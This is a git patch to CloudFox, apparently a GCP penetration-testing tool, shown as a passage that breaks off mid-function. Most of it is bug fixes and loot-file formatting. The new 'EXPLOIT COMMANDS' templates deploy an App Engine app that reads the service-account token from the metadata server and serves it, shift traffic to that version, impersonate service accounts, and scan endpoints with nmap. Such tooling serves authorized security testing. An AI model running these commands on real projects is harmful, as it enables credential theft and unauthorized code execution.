a/gcp/services/artifactRegistryService/artifactRegistryService.go +++ b/gcp/services/artifactRegistryService/artifactRegistryService.go @@ -285,15 +285,21 @@ func parseDockerImageName(imageName string) DockerImageDetails { // Split the image name by '/' parts := strings.Split(imageName, "/") - // Extract details based on the known structure of the image name. - // Assuming the format is always consistent as described. + // Validate expected format: projects/{project}/locations/{location}/repositories/{repo}/dockerImages/{image@digest} + if len(parts) < 8 { + return DockerImageDetails{ImageName: imageName} + } + projectID := parts[1] location := parts[3] repository := parts[5] // The image name and digest are after the last '/', separated by '@' imageAndDigest := strings.Split(parts[7], "@") imageName = imageAndDigest[0] - digest := imageAndDigest[1] + digest := "" + if len(imageAndDigest) > 1 { + digest = imageAndDigest[1] + } // URL-decode the image name (e.g., "library%2Fnginx" -> "library/nginx") decodedImageName, err := url.PathUnescape(imageName) diff --git a/gcp/services/bigtableService/bigtableService.go b/gcp/services/bigtableService/bigtableService.go index fd7897bd..8a915ec7 100644 --- a/gcp/services/bigtableService/bigtableService.go +++ b/gcp/services/bigtableService/bigtableService.go @@ -100,8 +100,8 @@ func (s *BigtableService) ListInstances(projectID string) (*BigtableResult, erro } // Get clusters - clustersResp, _ := service.Projects.Instances.Clusters.List(instance.Name).Context(ctx).Do() - if clustersResp != nil { + clustersResp, clusterErr := service.Projects.Instances.Clusters.List(instance.Name).Context(ctx).Do() + if clusterErr == nil && clustersResp != nil { for _, cluster := range clustersResp.Clusters { info.Clusters = append(info.Clusters, ClusterInfo{ Name: extractName(cluster.Name), @@ -113,8 +113,8 @@ func (s *BigtableService) ListInstances(projectID string) (*BigtableResult, erro } // Get tables and their IAM policies - tablesResp, _ := service.Projects.Instances.Tables.List(instance.Name).Context(ctx).Do() - if tablesResp != nil { + tablesResp, tableErr := service.Projects.Instances.Tables.List(instance.Name).Context(ctx).Do() + if tableErr == nil && tablesResp != nil { for _, table := range tablesResp.Tables { tableInfo := BigtableTableInfo{ Name: extractName(table.Name), diff --git a/gcp/services/cloudbuildService/cloudbuildService.go b/gcp/services/cloudbuildService/cloudbuildService.go index 87309ae6..8182266f 100644 --- a/gcp/services/cloudbuildService/cloudbuildService.go +++ b/gcp/services/cloudbuildService/cloudbuildService.go @@ -3,6 +3,7 @@ package cloudbuildservice import ( "context" "fmt" + "strings" gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" "github.com/BishopFox/cloudfox/internal/gcp/sdk" @@ -353,6 +354,5 @@ func containsSecretKeyword(key string) bool { } func containsIgnoreCase(s, substr string) bool { - return len(s) >= len(substr) && (s == substr || - len(s) > len(substr) && (s[:len(substr)] == substr || s[len(s)-len(substr):] == substr)) + return strings.Contains(strings.ToUpper(s), strings.ToUpper(substr)) } diff --git a/gcp/services/composerService/composerService.go b/gcp/services/composerService/composerService.go index 9d61f160..2ab7ab23 100644 --- a/gcp/services/composerService/composerService.go +++ b/gcp/services/composerService/composerService.go @@ -147,9 +147,12 @@ func (s *ComposerService) parseEnvironment(env *composer.Environment, projectID // Software config if env.Config.SoftwareConfig != nil { - info.AirflowVersion = env.Config.SoftwareConfig.AirflowConfigOverrides["core-dags_are_paused_at_creation"] - info.PythonVersion = env.Config.SoftwareConfig.PythonVersion info.ImageVersion = env.Config.SoftwareConfig.ImageVersion + info.PythonVersion = env.Config.SoftwareConfig.PythonVersion + // Extract Airflow version from ImageVersion (format: composer-X.Y.Z-airflow-A.B.C) + if env.Config.SoftwareConfig.ImageVersion != "" { + info.AirflowVersion = env.Config.SoftwareConfig.ImageVersion + } } // Node config diff --git a/gcp/services/dataflowService/dataflowService.go b/gcp/services/dataflowService/dataflowService.go index 0cad6c71..4d8a0eef 100644 --- a/gcp/services/dataflowService/dataflowService.go +++ b/gcp/services/dataflowService/dataflowService.go @@ -152,7 +152,7 @@ func (s *DataflowService) analyzeJobRisk(job JobInfo) (string, []string) { } // Check for external temp/staging locations - if job.TempLocation != "" && !strings.Contains(job.TempLocation, projectID(job.ProjectID)) { + if job.TempLocation != "" && !strings.Contains(job.TempLocation, job.ProjectID) { reasons = append(reasons, "Temp location may be in external project") score += 1 } @@ -167,10 +167,6 @@ func (s *DataflowService) analyzeJobRisk(job JobInfo) (string, []string) { return "INFO", reasons } -func projectID(id string) string { - return id -} - func extractName(fullName string) string { parts := strings.Split(fullName, "/") if len(parts) > 0 { diff --git a/gcp/services/foxmapperService/foxmapperService.go b/gcp/services/foxmapperService/foxmapperService.go index 99b395ee..a41c5db2 100755 --- a/gcp/services/foxmapperService/foxmapperService.go +++ b/gcp/services/foxmapperService/foxmapperService.go @@ -740,7 +740,12 @@ func (s *FoxMapperService) GetPrivescSummary() map[string]interface{} { "project_admins": projectAdmins, "sa_with_privesc": saWithPrivesc, "user_with_privesc": userWithPrivesc, - "percent_with_privesc": float64(nodesWithPrivesc) / float64(totalNodes-adminNodes) * 100, + "percent_with_privesc": func() float64 { + if totalNodes-adminNodes == 0 { + return 0 + } + return float64(nodesWithPrivesc) / float64(totalNodes-adminNodes) * 100 + }(), } } diff --git a/gcp/services/kmsService/kmsService.go b/gcp/services/kmsService/kmsService.go index 6eb7b5c2..a3d3bec8 100644 --- a/gcp/services/kmsService/kmsService.go +++ b/gcp/services/kmsService/kmsService.go @@ -154,7 +154,8 @@ func (ks *KMSService) CryptoKeys(projectID string) ([]CryptoKeyInfo, error) { }) if err != nil { - // Continue with other key rings even if one fails + // Log but continue with other key rings + _ = err // Error from listing keys in this key ring - permission or API issue continue } } diff --git a/gcp/services/networkService/networkService.go b/gcp/services/networkService/networkService.go index 4028dca3..c54e79be 100644 --- a/gcp/services/networkService/networkService.go +++ b/gcp/services/networkService/networkService.go @@ -124,7 +124,9 @@ func getIPAddressesForTargetTag(instances []ComputeEngineService.ComputeEngineIn var ips []string for _, instance := range instances { if contains(instance.Tags.Items, tag) { - ips = append(ips, instance.NetworkInterfaces[0].NetworkIP) + if len(instance.NetworkInterfaces) > 0 { + ips = append(ips, instance.NetworkInterfaces[0].NetworkIP) + } } } return ips, nil diff --git a/gcp/services/resourceIAMService/resourceIAMService.go b/gcp/services/resourceIAMService/resourceIAMService.go index 8eecf566..0885b3e7 100644 --- a/gcp/services/resourceIAMService/resourceIAMService.go +++ b/gcp/services/resourceIAMService/resourceIAMService.go @@ -376,14 +376,27 @@ func (s *ResourceIAMService) GetSecretManagerIAM(ctx context.Context, projectID return nil, gcpinternal.ParseGCPError(err, "secretmanager.googleapis.com") } - // List secrets + // List secrets (with pagination) parent := fmt.Sprintf("projects/%s", projectID) - resp, err := smService.Projects.Secrets.List(parent).Context(ctx).Do() - if err != nil { - return nil, gcpinternal.ParseGCPError(err, "secretmanager.googleapis.com") + pageToken := "" + var allSecrets []*secretmanager.Secret + for { + call := smService.Projects.Secrets.List(parent).Context(ctx) + if pageToken != "" { + call = call.PageToken(pageToken) + } + resp, err := call.Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "secretmanager.googleapis.com") + } + allSecrets = append(allSecrets, resp.Secrets...) + if resp.NextPageToken == "" { + break + } + pageToken = resp.NextPageToken } - for _, secret := range resp.Secrets { + for _, secret := range allSecrets { // Get IAM policy for this secret policy, err := smService.Projects.Secrets.GetIamPolicy(secret.Name).Context(ctx).Do() if err != nil { diff --git a/gcp/services/spannerService/spannerService.go b/gcp/services/spannerService/spannerService.go index 7b5909cd..00609ed1 100644 --- a/gcp/services/spannerService/spannerService.go +++ b/gcp/services/spannerService/spannerService.go @@ -137,7 +137,7 @@ func (s *SpannerService) listDatabases(service *spanner.Service, ctx context.Con var databases []SpannerDatabaseInfo req := service.Projects.Instances.Databases.List(instanceName) - _ = req.Pages(ctx, func(page *spanner.ListDatabasesResponse) error { + err := req.Pages(ctx, func(page *spanner.ListDatabasesResponse) error { for _, db := range page.Databases { dbInfo := SpannerDatabaseInfo{ Name: extractName(db.Name), @@ -162,6 +162,10 @@ func (s *SpannerService) listDatabases(service *spanner.Service, ctx context.Con } return nil }) + if err != nil { + // Log but don't fail - return whatever we collected + return databases + } return databases } diff --git a/gcp/services/vpcscService/vpcscService.go b/gcp/services/vpcscService/vpcscService.go index bf83943b..45a08915 100644 --- a/gcp/services/vpcscService/vpcscService.go +++ b/gcp/services/vpcscService/vpcscService.go @@ -214,6 +214,11 @@ func (s *VPCSCService) parseAccessLevel(level *accesscontextmanager.AccessLevel, } } + // Handle custom access levels (CEL expressions) + if level.Custom != nil && level.Custom.Expr != nil && level.Custom.Expr.Expression != "" { + info.Description = fmt.Sprintf("Custom CEL: %s", level.Custom.Expr.Expression) + } + return info } From c9d1c2de68e97b073cd958824f019f7bf85d2c99 Mon Sep 17 00:00:00 2001 From: jbarciabf Date: Fri, 20 Feb 2026 11:59:20 -0500 Subject: [PATCH 41/48] normalized loot files and added additional commands --- gcp/commands/accesslevels.go | 76 +++++++++++++++- gcp/commands/appengine.go | 96 +++++++++++++++++++- gcp/commands/artifact-registry.go | 23 +++-- gcp/commands/assetinventory.go | 13 +-- gcp/commands/backupinventory.go | 14 +-- gcp/commands/beyondcorp.go | 90 +++++++++++++++++-- gcp/commands/bigquery.go | 20 +++-- gcp/commands/bigtable.go | 82 ++++++++++++++--- gcp/commands/bucketenum.go | 28 ++++++ gcp/commands/buckets.go | 9 +- gcp/commands/cloudbuild.go | 38 +++++--- gcp/commands/cloudrun.go | 28 ++++-- gcp/commands/cloudsql.go | 83 +++++++++++++++-- gcp/commands/compliancedashboard.go | 24 ++--- gcp/commands/composer.go | 114 ++++++++++++++++++++--- gcp/commands/costsecurity.go | 38 +++++--- gcp/commands/crossproject.go | 14 ++- gcp/commands/dataexfiltration.go | 35 ++++---- gcp/commands/dataflow.go | 99 ++++++++++++++++---- gcp/commands/dataproc.go | 120 ++++++++++++++++++++++--- gcp/commands/dns.go | 73 ++++++++++++--- gcp/commands/filestore.go | 14 +-- gcp/commands/firewall.go | 54 ++++++++--- gcp/commands/functions.go | 12 ++- gcp/commands/gke.go | 18 ++-- gcp/commands/hiddenadmins.go | 47 +++++----- gcp/commands/iam.go | 57 +++--------- gcp/commands/iap.go | 80 ++++++++++++++--- gcp/commands/identityfederation.go | 21 +++-- gcp/commands/instances.go | 48 +++++----- gcp/commands/keys.go | 2 +- gcp/commands/kms.go | 13 ++- gcp/commands/lateralmovement.go | 27 ++++-- gcp/commands/loadbalancers.go | 7 +- gcp/commands/logging.go | 17 ++-- gcp/commands/memorystore.go | 12 ++- gcp/commands/monitoringalerts.go | 27 ++++-- gcp/commands/networktopology.go | 47 +++++++--- gcp/commands/notebooks.go | 89 +++++++++++++++--- gcp/commands/organizations.go | 18 ++-- gcp/commands/orgpolicies.go | 113 ++++++++++++++++++++++- gcp/commands/permissions.go | 28 +++--- gcp/commands/privateserviceconnect.go | 46 +++++++--- gcp/commands/publicaccess.go | 12 ++- gcp/commands/pubsub.go | 12 +-- gcp/commands/resourceiam.go | 124 +++++++++++++++++++++++--- gcp/commands/scheduler.go | 12 ++- gcp/commands/secrets.go | 10 ++- gcp/commands/securitycenter.go | 8 +- gcp/commands/serviceaccounts.go | 8 +- gcp/commands/serviceagents.go | 4 +- gcp/commands/sourcerepos.go | 4 +- gcp/commands/spanner.go | 58 +++++++++--- gcp/commands/vpcnetworks.go | 14 +-- gcp/commands/vpcsc.go | 68 ++++++++++++-- gcp/commands/whoami.go | 12 +-- gcp/commands/workloadidentity.go | 16 ++-- 57 files changed, 1802 insertions(+), 474 deletions(-) diff --git a/gcp/commands/accesslevels.go b/gcp/commands/accesslevels.go index 5c51393d..ecc90b01 100644 --- a/gcp/commands/accesslevels.go +++ b/gcp/commands/accesslevels.go @@ -144,7 +144,7 @@ func (m *AccessLevelsModule) processOrg(ctx context.Context, orgID string, logge m.LootMap[orgID] = make(map[string]*internal.LootFile) m.LootMap[orgID]["access-levels-details"] = &internal.LootFile{ Name: "access-levels-details", - Contents: "# Access Levels (Conditional Access Policies)\n# Generated by CloudFox\n\n", + Contents: "# Access Levels (Conditional Access Policies)\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", } m.LootMap[orgID]["access-levels-allowed-ips"] = &internal.LootFile{ Name: "access-levels-allowed-ips", @@ -173,8 +173,76 @@ func (m *AccessLevelsModule) processOrg(ctx context.Context, orgID string, logge func (m *AccessLevelsModule) addToLoot(orgID string, level accesspolicyservice.AccessLevelInfo) { if lootFile := m.LootMap[orgID]["access-levels-details"]; lootFile != nil { lootFile.Contents += fmt.Sprintf( - "# Level: %s\n# Title: %s\n# Policy: %s\n# Combining: %s\n# Conditions: %d\n\n", + "# =============================================================================\n"+ + "# ACCESS LEVEL: %s\n"+ + "# =============================================================================\n"+ + "# Title: %s\n"+ + "# Policy: %s\n"+ + "# Combining Function: %s\n"+ + "# Conditions: %d\n", level.Name, level.Title, level.PolicyName, level.CombiningFunction, len(level.Conditions)) + + // Condition details + for i, condition := range level.Conditions { + lootFile.Contents += fmt.Sprintf("# --- Condition %d ---\n", i+1) + if len(condition.IPSubnetworks) > 0 { + lootFile.Contents += fmt.Sprintf("# IP Subnets: %s\n", strings.Join(condition.IPSubnetworks, ", ")) + } + if len(condition.Members) > 0 { + lootFile.Contents += fmt.Sprintf("# Members: %s\n", strings.Join(condition.Members, ", ")) + } + if len(condition.Regions) > 0 { + lootFile.Contents += fmt.Sprintf("# Regions: %s\n", strings.Join(condition.Regions, ", ")) + } + if condition.DevicePolicy != nil { + lootFile.Contents += "# Device Policy: configured\n" + } + } + + // Extract short level name for gcloud commands + levelName := level.Name + policyName := level.PolicyName + + lootFile.Contents += fmt.Sprintf(` +# === ENUMERATION COMMANDS === + +# Describe this access level: +gcloud access-context-manager levels describe %s --policy=%s + +# List all conditions for this access level: +gcloud access-context-manager levels describe %s --policy=%s --format=json | jq '.basic.conditions' + +# List all access levels in this policy: +gcloud access-context-manager levels list --policy=%s + +# === EXPLOIT COMMANDS === + +# Check if your current IP is allowed by this access level: +curl -s ifconfig.me && echo " <- Check if this IP is in the allowed subnets above" + +`, levelName, policyName, + levelName, policyName, + policyName) + + // Add IP-specific bypass checks + if len(level.Conditions) > 0 { + for _, condition := range level.Conditions { + if len(condition.IPSubnetworks) > 0 { + lootFile.Contents += "# Test connectivity from allowed IP ranges (use with VPN/proxy):\n" + for _, ip := range condition.IPSubnetworks { + lootFile.Contents += fmt.Sprintf("# Allowed subnet: %s\n", ip) + } + lootFile.Contents += "\n" + } + if len(condition.Members) > 0 { + lootFile.Contents += "# Members that can bypass this access level:\n" + for _, member := range condition.Members { + lootFile.Contents += fmt.Sprintf("# %s\n", member) + } + lootFile.Contents += "\n" + } + } + } } for _, condition := range level.Conditions { @@ -316,7 +384,7 @@ func (m *AccessLevelsModule) writeHierarchicalOutput(ctx context.Context, logger var lootFiles []internal.LootFile if orgLoot, ok := m.LootMap[orgID]; ok { for _, loot := range orgLoot { - if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { lootFiles = append(lootFiles, *loot) } } @@ -369,7 +437,7 @@ func (m *AccessLevelsModule) writeFlatOutput(ctx context.Context, logger interna var lootFiles []internal.LootFile for _, orgLoot := range m.LootMap { for _, loot := range orgLoot { - if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { lootFiles = append(lootFiles, *loot) } } diff --git a/gcp/commands/appengine.go b/gcp/commands/appengine.go index f455c76f..47d88a3a 100644 --- a/gcp/commands/appengine.go +++ b/gcp/commands/appengine.go @@ -216,9 +216,13 @@ func (m *AppEngineModule) processProject(ctx context.Context, projectID string, m.LootMap[projectID]["appengine-commands"] = &internal.LootFile{ Name: "appengine-commands", Contents: "# App Engine Commands\n" + - "# Generated by CloudFox\n\n", + "# Generated by CloudFox\n" + + "# WARNING: Only use with proper authorization\n\n", } } + + // Add app-level enumeration and exploit commands to loot + m.addAppToLoot(projectID, app.Id, app.DefaultHostname, app.LocationId, app.ServiceAccount) m.mu.Unlock() appRecord := AppEngineApp{ @@ -388,6 +392,92 @@ func (m *AppEngineModule) enumerateFirewallRules(ctx context.Context, projectID m.mu.Unlock() } +func (m *AppEngineModule) addAppToLoot(projectID, appID, defaultHostname, locationID, serviceAccount string) { + lootFile := m.LootMap[projectID]["appengine-commands"] + if lootFile == nil { + return + } + + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# APP ENGINE: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s\n"+ + "# Location: %s\n"+ + "# Default Hostname: %s\n"+ + "# Service Account: %s\n", + appID, projectID, locationID, defaultHostname, serviceAccount, + ) + + lootFile.Contents += fmt.Sprintf(` +# === ENUMERATION COMMANDS === + +# Describe app: +gcloud app describe --project=%s + +# List services: +gcloud app services list --project=%s + +# List versions for all services: +gcloud app versions list --project=%s + +# List firewall rules: +gcloud app firewall-rules list --project=%s + +# Describe specific service: +gcloud app services describe default --project=%s + +# View application logs: +gcloud app logs read --project=%s --limit=50 + +# List dispatch rules: +gcloud app describe --project=%s --format=json | jq '.dispatchRules' + +# === EXPLOIT COMMANDS === + +# Deploy a new version (code execution as App Engine SA: %s): +# Create a minimal app.yaml: +cat > /tmp/app.yaml << 'APPEOF' +runtime: python39 +instance_class: F1 +handlers: +- url: /.* + script: auto +APPEOF +cat > /tmp/main.py << 'MAINEOF' +import requests, json +from flask import Flask +app = Flask(__name__) +@app.route('/') +def index(): + r = requests.get('http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token', headers={'Metadata-Flavor': 'Google'}) + return json.dumps(r.json()) +MAINEOF +gcloud app deploy /tmp/app.yaml --project=%s --quiet --no-promote + +# Deploy to a specific service: +gcloud app deploy /tmp/app.yaml --project=%s --service=cloudfox-test --quiet --no-promote + +# Set traffic to new malicious version: +gcloud app services set-traffic default --splits=VERSION_ID=1 --project=%s + +# SSH to App Engine Flex instance (only for flex environment): +gcloud app instances ssh INSTANCE_ID --service=SERVICE --version=VERSION --project=%s + +# Access default URL: +curl https://%s + +# Impersonate App Engine default service account: +gcloud auth print-access-token --impersonate-service-account=%s + +`, + projectID, projectID, projectID, projectID, projectID, projectID, projectID, + serviceAccount, + projectID, projectID, projectID, projectID, + defaultHostname, serviceAccount, + ) +} + func (m *AppEngineModule) analyzeEnvVars(envVars map[string]string, serviceID, versionID, projectID string) int { secretPatterns := []string{ "PASSWORD", "SECRET", "API_KEY", "TOKEN", "PRIVATE_KEY", @@ -665,7 +755,7 @@ func (m *AppEngineModule) writeHierarchicalOutput(ctx context.Context, logger in var lootFiles []internal.LootFile if projectLoot, ok := m.LootMap[projectID]; ok { for _, loot := range projectLoot { - if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { lootFiles = append(lootFiles, *loot) } } @@ -703,7 +793,7 @@ func (m *AppEngineModule) writeFlatOutput(ctx context.Context, logger internal.L var lootFiles []internal.LootFile for _, projectLoot := range m.LootMap { for _, loot := range projectLoot { - if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { lootFiles = append(lootFiles, *loot) } } diff --git a/gcp/commands/artifact-registry.go b/gcp/commands/artifact-registry.go index e93d028f..844b19d4 100644 --- a/gcp/commands/artifact-registry.go +++ b/gcp/commands/artifact-registry.go @@ -199,7 +199,10 @@ func (m *ArtifactRegistryModule) addRepositoryToLoot(projectID string, repo Arti // Handle legacy Container Registry differently if repo.RegistryType == "container-registry" { lootFile.Contents += fmt.Sprintf( - "## Legacy Container Registry: %s (Project: %s)\n"+ + "# =============================================================================\n"+ + "# LEGACY CONTAINER REGISTRY: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s\n"+ "# Note: Consider migrating to Artifact Registry\n"+ "# Configure Docker authentication:\n"+ "gcloud auth configure-docker %s\n"+ @@ -217,8 +220,12 @@ func (m *ArtifactRegistryModule) addRepositoryToLoot(projectID string, repo Arti // Repository header and enumeration commands lootFile.Contents += fmt.Sprintf( - "## Repository: %s (Project: %s, Location: %s)\n"+ - "# Format: %s, Mode: %s, Encryption: %s, Public: %s\n"+ + "# =============================================================================\n"+ + "# REPOSITORY: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s, Location: %s\n"+ + "# Format: %s, Mode: %s, Encryption: %s, Public: %s\n\n"+ + "# === ENUMERATION COMMANDS ===\n\n"+ "# Describe repository:\n"+ "gcloud artifacts repositories describe %s --project=%s --location=%s\n"+ "# Get IAM policy:\n"+ @@ -259,14 +266,18 @@ func (m *ArtifactRegistryModule) addArtifactToLoot(projectID string, artifact Ar artifact.Location, artifact.ProjectID, artifact.Repository, artifact.Name) lootFile.Contents += fmt.Sprintf( - "## Docker Image: %s (Project: %s)\n"+ - "# Repository: %s, Location: %s\n"+ + "# -----------------------------------------------------------------------------\n"+ + "# DOCKER IMAGE: %s\n"+ + "# -----------------------------------------------------------------------------\n"+ + "# Project: %s, Repository: %s, Location: %s\n"+ "# Digest: %s\n", - artifact.Name, artifact.ProjectID, + artifact.Name, + artifact.ProjectID, artifact.Repository, artifact.Location, artifact.Digest, ) + lootFile.Contents += "\n# === EXPLOIT COMMANDS ===\n\n" // Generate commands for each tag if len(artifact.Tags) > 0 { for _, tag := range artifact.Tags { diff --git a/gcp/commands/assetinventory.go b/gcp/commands/assetinventory.go index 00cdc3df..849cc991 100644 --- a/gcp/commands/assetinventory.go +++ b/gcp/commands/assetinventory.go @@ -166,11 +166,11 @@ func (m *AssetInventoryModule) initializeLootForProject(projectID string) { m.LootMap[projectID] = make(map[string]*internal.LootFile) m.LootMap[projectID]["asset-inventory-details"] = &internal.LootFile{ Name: "asset-inventory-details", - Contents: "# Cloud Asset Inventory Details\n# Generated by CloudFox\n\n", + Contents: "# Cloud Asset Inventory Details\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", } m.LootMap[projectID]["asset-inventory-commands"] = &internal.LootFile{ Name: "asset-inventory-commands", - Contents: "# Cloud Asset Inventory Commands\n# Generated by CloudFox\n\n", + Contents: "# Cloud Asset Inventory Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", } } } @@ -556,7 +556,10 @@ func (m *AssetInventoryModule) generateQueryTemplates() { func (m *AssetInventoryModule) addToLoot(projectID string, asset assetservice.AssetInfo) { if lootFile := m.LootMap[projectID]["asset-inventory-details"]; lootFile != nil { lootFile.Contents += fmt.Sprintf( - "# Asset: %s\n# Type: %s\n# Project: %s\n# Location: %s\n", + "# =============================================================================\n"+ + "# ASSET: %s\n"+ + "# =============================================================================\n"+ + "# Type: %s\n# Project: %s\n# Location: %s\n", asset.Name, asset.AssetType, asset.ProjectID, asset.Location) if asset.PublicAccess { @@ -788,7 +791,7 @@ func (m *AssetInventoryModule) writeHierarchicalOutput(ctx context.Context, logg var lootFiles []internal.LootFile if projectLoot, ok := m.LootMap[projectID]; ok { for _, loot := range projectLoot { - if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { lootFiles = append(lootFiles, *loot) } } @@ -837,7 +840,7 @@ func (m *AssetInventoryModule) writeFlatOutput(ctx context.Context, logger inter var lootFiles []internal.LootFile for _, projectLoot := range m.LootMap { for _, loot := range projectLoot { - if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { lootFiles = append(lootFiles, *loot) } } diff --git a/gcp/commands/backupinventory.go b/gcp/commands/backupinventory.go index 1d9bb573..b06d4019 100644 --- a/gcp/commands/backupinventory.go +++ b/gcp/commands/backupinventory.go @@ -244,7 +244,7 @@ func (m *BackupInventoryModule) processProject(ctx context.Context, projectID st m.LootMap[projectID] = make(map[string]*internal.LootFile) m.LootMap[projectID]["backup-inventory-commands"] = &internal.LootFile{ Name: "backup-inventory-commands", - Contents: "# Backup Inventory Commands\n# Generated by CloudFox\n\n", + Contents: "# Backup Inventory Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", } } m.mu.Unlock() @@ -351,7 +351,9 @@ func (m *BackupInventoryModule) enumerateSnapshots(ctx context.Context, projectI } lootFile.Contents += fmt.Sprintf( - "### Snapshot: %s (Source: %s, Size: %dGB)\n"+ + "# -----------------------------------------------------------------------------\n"+ + "# SNAPSHOT: %s (Source: %s, Size: %dGB)\n"+ + "# -----------------------------------------------------------------------------\n"+ "# Create a disk from this snapshot\n"+ "gcloud compute disks create disk-from-%s \\\n"+ " --project=%s \\\n"+ @@ -545,7 +547,7 @@ func (m *BackupInventoryModule) identifyUnprotectedResources() { m.LootMap[info.ProjectID] = make(map[string]*internal.LootFile) m.LootMap[info.ProjectID]["backup-inventory-commands"] = &internal.LootFile{ Name: "backup-inventory-commands", - Contents: "# Backup Inventory Commands\n# Generated by CloudFox\n\n", + Contents: "# Backup Inventory Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", } } // No loot commands for unprotected disks - these are informational only @@ -571,7 +573,7 @@ func (m *BackupInventoryModule) identifyUnprotectedResources() { m.LootMap[info.ProjectID] = make(map[string]*internal.LootFile) m.LootMap[info.ProjectID]["backup-inventory-commands"] = &internal.LootFile{ Name: "backup-inventory-commands", - Contents: "# Backup Inventory Commands\n# Generated by CloudFox\n\n", + Contents: "# Backup Inventory Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", } } // No loot commands for unprotected SQL instances - these are informational only @@ -820,7 +822,7 @@ func (m *BackupInventoryModule) writeHierarchicalOutput(ctx context.Context, log var lootFiles []internal.LootFile if projectLoot, ok := m.LootMap[projectID]; ok { for _, loot := range projectLoot { - if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { lootFiles = append(lootFiles, *loot) } } @@ -862,7 +864,7 @@ func (m *BackupInventoryModule) writeFlatOutput(ctx context.Context, logger inte var lootFiles []internal.LootFile for _, projectLoot := range m.LootMap { for _, loot := range projectLoot { - if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { lootFiles = append(lootFiles, *loot) } } diff --git a/gcp/commands/beyondcorp.go b/gcp/commands/beyondcorp.go index 466479bc..59ec47df 100644 --- a/gcp/commands/beyondcorp.go +++ b/gcp/commands/beyondcorp.go @@ -124,7 +124,7 @@ func (m *BeyondCorpModule) processProject(ctx context.Context, projectID string, m.LootMap[projectID] = make(map[string]*internal.LootFile) m.LootMap[projectID]["beyondcorp-details"] = &internal.LootFile{ Name: "beyondcorp-details", - Contents: "# BeyondCorp Details\n# Generated by CloudFox\n\n", + Contents: "# BeyondCorp Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", } } m.mu.Unlock() @@ -138,6 +138,9 @@ func (m *BeyondCorpModule) processProject(ctx context.Context, projectID string, } m.mu.Lock() m.ProjectAppConnectors[projectID] = connectors + for _, connector := range connectors { + m.addConnectorToLoot(projectID, connector) + } m.mu.Unlock() // Get app connections @@ -161,13 +164,84 @@ func (m *BeyondCorpModule) addConnectionToLoot(projectID string, conn beyondcorp return } lootFile.Contents += fmt.Sprintf( - "# Connection: %s\n# Endpoint: %s\n# Gateway: %s\n# Connectors: %s\n", - conn.Name, conn.ApplicationEndpoint, conn.Gateway, strings.Join(conn.Connectors, ", ")) - + "# =============================================================================\n"+ + "# CONNECTION: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s\n"+ + "# Location: %s\n"+ + "# State: %s\n"+ + "# Endpoint: %s\n"+ + "# Gateway: %s\n"+ + "# Connectors: %s\n", + conn.Name, conn.ProjectID, conn.Location, conn.State, + conn.ApplicationEndpoint, conn.Gateway, strings.Join(conn.Connectors, ", ")) + + lootFile.Contents += fmt.Sprintf(` +# === ENUMERATION COMMANDS === + +# Describe this app connection: +gcloud beta beyondcorp app connections describe %s --location=%s --project=%s + +# List IAM policy for this connection: +gcloud beta beyondcorp app connections get-iam-policy %s --location=%s --project=%s + +# List all app connectors in the project: +gcloud beta beyondcorp app connectors list --location=%s --project=%s + +# List all app connections in the project: +gcloud beta beyondcorp app connections list --location=%s --project=%s + +`, conn.Name, conn.Location, conn.ProjectID, + conn.Name, conn.Location, conn.ProjectID, + conn.Location, conn.ProjectID, + conn.Location, conn.ProjectID) + + // Exploitation commands if conn.ApplicationEndpoint != "" { - lootFile.Contents += fmt.Sprintf("# Application Endpoint: %s\n", conn.ApplicationEndpoint) + lootFile.Contents += fmt.Sprintf( + "# === EXPLOIT COMMANDS ===\n\n"+ + "# Test connectivity to application endpoint:\n"+ + "curl -v %s\n\n"+ + "# Scan endpoint for open ports (if IP-based):\n"+ + "nmap -sV %s\n\n", + conn.ApplicationEndpoint, conn.ApplicationEndpoint) + } + + if conn.PublicAccess { + lootFile.Contents += "# [FINDING] This connection has PUBLIC access!\n" + + "# Check IAM bindings for allUsers/allAuthenticatedUsers\n\n" + } +} + +func (m *BeyondCorpModule) addConnectorToLoot(projectID string, connector 